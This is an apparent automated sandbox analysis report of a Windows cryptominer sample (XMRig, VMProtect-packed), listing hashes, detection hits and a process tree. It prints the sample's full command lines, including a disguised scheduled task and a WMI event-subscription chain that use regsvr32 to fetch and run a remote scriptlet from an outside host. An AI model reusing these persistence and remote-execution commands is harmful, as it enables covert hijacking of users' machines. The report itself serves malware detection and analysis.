Analysis
- max time kernel: 146s
- max time network: 147s
- platform: windows10-2004_x64
- resource: win10v2004-20240426-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 26/05/2024, 11:11
Behavioral task: behavioral1
- Sample: 75497caaa52797d58a70cdbe1cb1252c_JaffaCakes118.exe
- Resource: win7-20231129-en
General
- Target: 75497caaa52797d58a70cdbe1cb1252c_JaffaCakes118.exe
- Size: 348KB
- MD5: 75497caaa52797d58a70cdbe1cb1252c
- SHA1: a3ee3f7b8940dfadfc728b7467679879640f9578
- SHA256: cccdcd65247b27e1d3587cc6d365a5dd703954ec578f288ccf2c97b85837b069
- SHA512: f3f9ab4f058af45f4b148433f565fa1d602339b52cca84ea8dd1dc1ef59c1c7050cf04421a77dd557e81ddf316a5177ff89bfafb50de5f26d7ca85289b50d2d6
- SSDEEP: 6144:FbF9t7qqDX+ZUMPyc0vcDDleaLDnKVaG1S/YNe7Y:5D4qr+SMPGv2DleaLDnKkG1fl
Malware Config
Signatures
- XMRig Miner payload (3 IoCs)
  resource                                                                   yara_rule
  behavioral2/memory/4424-0-0x00007FF72C450000-0x00007FF72C50C000-memory.dmp  xmrig
  behavioral2/memory/4424-1-0x00007FF72C450000-0x00007FF72C50C000-memory.dmp  xmrig
  behavioral2/memory/4424-4-0x00007FF72C450000-0x00007FF72C50C000-memory.dmp  xmrig

  resource                                                                   yara_rule
  behavioral2/memory/4424-0-0x00007FF72C450000-0x00007FF72C50C000-memory.dmp  vmprotect
  behavioral2/memory/4424-1-0x00007FF72C450000-0x00007FF72C50C000-memory.dmp  vmprotect
  behavioral2/memory/4424-4-0x00007FF72C450000-0x00007FF72C50C000-memory.dmp  vmprotect
- Creates scheduled task(s) (1 TTPs, 1 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid   Process
  4388  SchTasks.exe
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  The same 21 token adjustments are recorded for each of the three wmic.exe processes (pid 8, pid 3500, pid 3400), in that order:
  Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  One further adjustment is recorded for the sample itself:
  Token: SeLockMemoryPrivilege, pid 4424, 75497caaa52797d58a70cdbe1cb1252c_JaffaCakes118.exe
- Suspicious use of WriteProcessMemory (8 IoCs)
  description                  pid   Process                                            procid_target
  PID 4424 wrote to memory of  4388  75497caaa52797d58a70cdbe1cb1252c_JaffaCakes118.exe  83
  PID 4424 wrote to memory of  4388  75497caaa52797d58a70cdbe1cb1252c_JaffaCakes118.exe  83
  PID 4424 wrote to memory of  8     75497caaa52797d58a70cdbe1cb1252c_JaffaCakes118.exe  84
  PID 4424 wrote to memory of  8     75497caaa52797d58a70cdbe1cb1252c_JaffaCakes118.exe  84
  PID 4424 wrote to memory of  3400  75497caaa52797d58a70cdbe1cb1252c_JaffaCakes118.exe  85
  PID 4424 wrote to memory of  3400  75497caaa52797d58a70cdbe1cb1252c_JaffaCakes118.exe  85
  PID 4424 wrote to memory of  3500  75497caaa52797d58a70cdbe1cb1252c_JaffaCakes118.exe  86
  PID 4424 wrote to memory of  3500  75497caaa52797d58a70cdbe1cb1252c_JaffaCakes118.exe  86
- Uses Task Scheduler COM API (1 TTPs)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
- C:\Users\Admin\AppData\Local\Temp\75497caaa52797d58a70cdbe1cb1252c_JaffaCakes118.exe (PID 4424, depth 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\75497caaa52797d58a70cdbe1cb1252c_JaffaCakes118.exe"
  Signatures: Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
  - C:\Windows\SYSTEM32\SchTasks.exe (PID 4388, depth 2)
    Command line: SchTasks.exe /Create /SC MINUTE /TN WindowsUpdateInternel /TR "regsvr32 /s /n /u /i:http://down.cacheoffer.tk/d2/reg9.sct scrobj.dll" /MO 5 /F
    Signatures: Creates scheduled task(s)
  - C:\Windows\System32\Wbem\wmic.exe (PID 8, depth 2)
    Command line: wmic /NAMESPACE:"\\\root\subscription" PATH __EventFilter CREATE Name="H888", EventNameSpace="root\cimv2", QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_PerfFormattedData_PerfOS_System" AND TargetInstance.SystemUpTime >= 200 AND TargetInstance.SystemUpTime < 320"
    Signatures: Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\Wbem\wmic.exe (PID 3400, depth 2)
    Command line: wmic /NAMESPACE:"\\\root\subscription" PATH CommandLineEventConsumer CREATE Name="H999", CommandLineTemplate="regsvr32 /s /n /u /i:http://down.cacheoffer.tk/d2/reg9.sct scrobj.dll"
    Signatures: Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\Wbem\wmic.exe (PID 3500, depth 2)
    Command line: wmic /NAMESPACE:"\\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"H888\"", Consumer="CommandLineEventConsumer.Name=\"H999\""
    Signatures: Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\wbem\WmiApSrv.exe (PID 3164, depth 1)
  Command line: C:\Windows\system32\wbem\WmiApSrv.exe